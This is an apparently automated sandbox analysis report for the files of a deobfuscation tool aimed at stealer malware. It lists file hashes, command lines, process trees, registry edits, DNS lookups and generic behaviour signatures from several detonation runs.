SHA512 441f18e8ce07498bc65575e1ae86c1636e1ceb126af937e2547710131376be7b4cb0792403409a81b5c6d897b239f26ec9f36388069e324249778a052746795e

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI48682\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_queue.pyd

MD5 6e0cb85dc94e351474d7625f63e49b22
SHA1 66737402f76862eb2278e822b94e0d12dcb063c5
SHA256 3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b
SHA512 1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI48682\VCRUNTIME140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\_MEI48682\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

C:\Users\Admin\AppData\Local\Temp\_MEI48682\libssl-3.dll

MD5 19a2aba25456181d5fb572d88ac0e73e
SHA1 656ca8cdfc9c3a6379536e2027e93408851483db
SHA256 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006
SHA512 df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_ssl.pyd

MD5 5b9b3f978d07e5a9d701f832463fc29d
SHA1 0fcd7342772ad0797c9cb891bf17e6a10c2b155b
SHA256 d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa
SHA512 e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_uuid.pyd

MD5 353e11301ea38261e6b1cb261a81e0fe
SHA1 607c5ebe67e29eabc61978fb52e4ec23b9a3348e
SHA256 d132f754471bd8a6f6d7816453c2e542f250a4d8089b657392fe61a500ae7899
SHA512 fa990b3e9619d59ae3ad0aeffca7a3513ab143bfd0ac9277e711519010f7c453258a4b041be86a275f3c365e980fc857c23563f3b393d1e3a223973a673e88c5

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_sqlite3.pyd

MD5 29464d52ba96bb11dbdccbb7d1e067b4
SHA1 d6a288e68f54fb3f3b38769f271bf885fd30cbf6
SHA256 3e96cd9e8abbea5c6b11ee91301d147f3e416ac6c22eb53123eaeae51592d2fe
SHA512 3191980cdf4ab34e0d53ba18e609804c312348da5b79b7242366b9e3be7299564bc1ec08f549598041d434c9c5d27684349eff0eaa45f8fa66a02dd02f97862b

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_overlapped.pyd

MD5 ba368245d104b1e016d45e96a54dd9ce
SHA1 b79ef0eb9557a0c7fa78b11997de0bb057ab0c52
SHA256 67e6ca6f1645c6928ade6718db28aff1c49a192e8811732b5e99364991102615
SHA512 429d7a1f829be98c28e3dca5991edcadff17e91f050d50b608a52ef39f6f1c6b36ab71bfa8e3884167371a4e40348a8cda1a9492b125fb19d1a97c0ccb8f2c7b

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_multiprocessing.pyd

MD5 a4281e383ef82c482c8bda50504be04a
SHA1 4945a2998f9c9f8ce1c078395ffbedb29c715d5d
SHA256 467b0fef42d70b55abf41d817dff7631faeef84dce64f8aadb5690a22808d40c
SHA512 661e38b74f8bfdd14e48e65ee060da8ecdf67c0e3ca1b41b6b835339ab8259f55949c1f8685102fd950bf5de11a1b7c263da8a3a4b411f1f316376b8aa4a5683

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_cffi_backend.cp312-win_amd64.pyd

MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

C:\Users\Admin\AppData\Local\Temp\_MEI48682\_asyncio.pyd

MD5 28d2a0405be6de3d168f28109030130c
SHA1 7151eccbd204b7503f34088a279d654cfe2260c9
SHA256 2dfcaec25de17be21f91456256219578eae9a7aec5d21385dec53d0840cf0b8d
SHA512 b87f406f2556fac713967e5ae24729e827f2112c318e73fe8ba28946fd6161802de629780fad7a3303cf3dbab7999b15b535f174c85b3cbb7bb3c67915f3b8d0

C:\Users\Admin\AppData\Local\Temp\_MEI48682\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI48682\sqlite3.dll

MD5 612fc8a817c5faa9cb5e89b0d4096216
SHA1 c8189cbb846f9a77f1ae67f3bd6b71b6363b9562
SHA256 7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49
SHA512 8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237

C:\Users\Admin\AppData\Local\Temp\_MEI48682\pyexpat.pyd

MD5 5e911ca0010d5c9dce50c58b703e0d80
SHA1 89be290bebab337417c41bab06f43effb4799671
SHA256 4779e19ee0f4f0be953805efa1174e127f6e91ad023bd33ac7127fef35e9087b
SHA512 e3f1db80748333f08f79f735a457246e015c10b353e1a52abe91ed9a69f7de5efa5f78a2ed209e97b16813cb74a87f8f0c63a5f44c8b59583851922f54a48cf5

C:\Users\Admin\AppData\Local\Temp\_MEI48682\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

MD5 bf9a9da1cf3c98346002648c3eae6dcf
SHA1 db16c09fdc1722631a7a9c465bfe173d94eb5d8b
SHA256 4107b1d6f11d842074a9f21323290bbe97e8eed4aa778fbc348ee09cc4fa4637
SHA512 7371407d12e632fc8fb031393838d36e6a1fe1e978ced36ff750d84e183cde6dd20f75074f4597742c9f8d6f87af12794c589d596a81b920c6c62ee2ba2e5654

C:\Users\Admin\AppData\Local\Temp\_MEI48682\charset_normalizer\md.cp312-win_amd64.pyd

MD5 d9e0217a89d9b9d1d778f7e197e0c191
SHA1 ec692661fcc0b89e0c3bde1773a6168d285b4f0d
SHA256 ecf12e2c0a00c0ed4e2343ea956d78eed55e5a36ba49773633b2dfe7b04335c0
SHA512 3b788ac88c1f2d682c1721c61d223a529697c7e43280686b914467b3b39e7d6debaff4c0e2f42e9dddb28b522f37cb5a3011e91c66d911609c63509f9228133d

C:\Users\Admin\AppData\Local\Temp\_MEI48682\Crypto\Cipher\_raw_cbc.pyd

MD5 20708935fdd89b3eddeea27d4d0ea52a
SHA1 85a9fe2c7c5d97fd02b47327e431d88a1dc865f7
SHA256 11dd1b49f70db23617e84e08e709d4a9c86759d911a24ebddfb91c414cc7f375
SHA512 f28c31b425dc38b5e9ad87b95e8071997e4a6f444608e57867016178cd0ca3e9f73a4b7f2a0a704e45f75b7dcff54490510c6bf8461f3261f676e9294506d09b

C:\Users\Admin\AppData\Local\Temp\_MEI48682\Crypto\Cipher\_raw_ctr.pyd

MD5 c6b20332b4814799e643badffd8df2cd
SHA1 e7da1c1f09f6ec9a84af0ab0616afea55a58e984
SHA256 61c7a532e108f67874ef2e17244358df19158f6142680f5b21032ba4889ac5d8
SHA512 d50c7f67d2dfb268ad4cf18e16159604b6e8a50ea4f0c9137e26619fd7835faad323b5f6a2b8e3ec1c023e0678bcbe5d0f867cd711c5cd405bd207212228b2b4

C:\Users\Admin\AppData\Local\Temp\_MEI48682\Crypto\Cipher\_raw_ofb.pyd

MD5 4d9182783ef19411ebd9f1f864a2ef2f
SHA1 ddc9f878b88e7b51b5f68a3f99a0857e362b0361
SHA256 c9f4c5ffcdd4f8814f8c07ce532a164ab699ae8cde737df02d6ecd7b5dd52dbd
SHA512 8f983984f0594c2cac447e9d75b86d6ec08ed1c789958afa835b0d1239fd4d7ebe16408d080e7fce17c379954609a93fc730b11be6f4a024e7d13d042b27f185

C:\Users\Admin\AppData\Local\Temp\_MEI48682\Crypto\Cipher\_raw_cfb.pyd

MD5 43bbe5d04460bd5847000804234321a6
SHA1 3cae8c4982bbd73af26eb8c6413671425828dbb7
SHA256 faa41385d0db8d4ee2ee74ee540bc879cf2e884bee87655ff3c89c8c517eed45
SHA512 dbc60f1d11d63bebbab3c742fb827efbde6dff3c563ae1703892d5643d5906751db3815b97cbfb7da5fcd306017e4a1cdcc0cdd0e61adf20e0816f9c88fe2c9b

C:\Users\Admin\AppData\Local\Temp\_MEI48682\Crypto\Cipher\_raw_ecb.pyd

MD5 fee13d4fb947835dbb62aca7eaff44ef
SHA1 7cc088ab68f90c563d1fe22d5e3c3f9e414efc04
SHA256 3e0d07bbf93e0748b42b1c2550f48f0d81597486038c22548224584ae178a543
SHA512 dea92f935bc710df6866e89cc6eb5b53fc7adf0f14f3d381b89d7869590a1b0b1f98f347664f7a19c6078e7aa3eb0f773ffcb711cc4275d0ecd54030d6cf5cb2

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240426-en

Max time kernel

92s

Max time network

98s

Command Line

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdas.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdas.exe

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdas.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240215-en

Max time kernel

121s

Max time network

126s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\luna.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\py_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\py_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\.py C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\.py\ = "py_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\py_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\py_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\py_auto_file\shell C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\luna.py"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\luna.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\luna.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 bffa72203655fdb18e7e271291613987
SHA1 9752a3f664bbd13d0786559160508d444cf12009
SHA256 4f473e61efbf71a54b18ad77ae9187832463aa37d2503f5cc5125f07a73f5243
SHA512 164897d3257480b23fadc24bcf79e0112fdfa88e6c0ef7f16b7c3d235302c13c14602bdce03e95cdb0201f924651ca5b993177075fba1f34387da3e991e11747

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

ubuntu2404-amd64-20240523-en

Max time network

134s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240426-en

Max time kernel

149s

Max time network

154s

Command Line

java -jar "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\fernflower.jar"

Signatures

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2856 wrote to memory of 464 N/A C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe C:\Windows\system32\icacls.exe
PID 2856 wrote to memory of 464 N/A C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe C:\Windows\system32\icacls.exe

Processes

C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe

java -jar "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\fernflower.jar"

C:\Windows\system32\icacls.exe

C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 9.73.50.20.in-addr.arpa udp

Files

memory/2856-2-0x000001E3EC4D0000-0x000001E3EC740000-memory.dmp

memory/2856-12-0x000001E3EAD00000-0x000001E3EAD01000-memory.dmp

C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp

MD5 4c2868877d2675e51c28fe69d1a31979
SHA1 226a253b4dbccd6c77d55534f3e6adc46ac28f50
SHA256 3ff7e6690277c43130bb2e9b8a89784c6ca86aab4d6840d97ec5dd61991081fd
SHA512 1925e9d918056319dd8461e76e5202ff84637da8a438722ed7ed48153ec5c412d77d995661f418752b6666e4712758e950dfbd7bc9ec17a35aef855acbf19dba

memory/2856-14-0x000001E3EC4D0000-0x000001E3EC740000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240508-en

Max time kernel

122s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdc.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdc.exe

"C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\bin\pycdc.exe"

Network

N/A

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240508-en

Max time kernel

93s

Max time network

99s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\blank.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\blank.py"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 152.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240508-en

Max time kernel

136s

Max time network

110s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\config.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\utils\config.py"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 216.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240508-en

Max time kernel

122s

Max time network

127s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\blank.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\py_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\.py C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\.py\ = "py_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\py_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\py_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\py_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\py_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_CLASSES\py_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\blank.py"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\blank.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\blank.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 7874a028e9df6fb036039bb4bf63f300
SHA1 25fe84f71f48c16cb7872ef33b63308e708c9293
SHA256 b20ec6ab54a4ef5eb480ca4f9db768afdbbdc6a40ca5b73ab42144ec057dd2eb
SHA512 ef8c6d724fdd3d86d38c0d63ccceb388c81beb597d96f28d96f2d0642b7fdf914ed1e4076cc15798ab6eea3f82202a2ee9b1658ded90bae1337d9129d33cc381

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win10v2004-20240508-en

Max time kernel

136s

Max time network

106s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\empyrean.py"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\empyrean.py"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-01 13:54

Reported

2024-06-01 13:57

Platform

win7-20240220-en

Max time kernel

118s

Max time network

121s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\decompiler for malware\Grabbers-Deobfuscator-main\methods\notobf.py"

Signatures

Enumerates physical storage devices

Modifies registry class

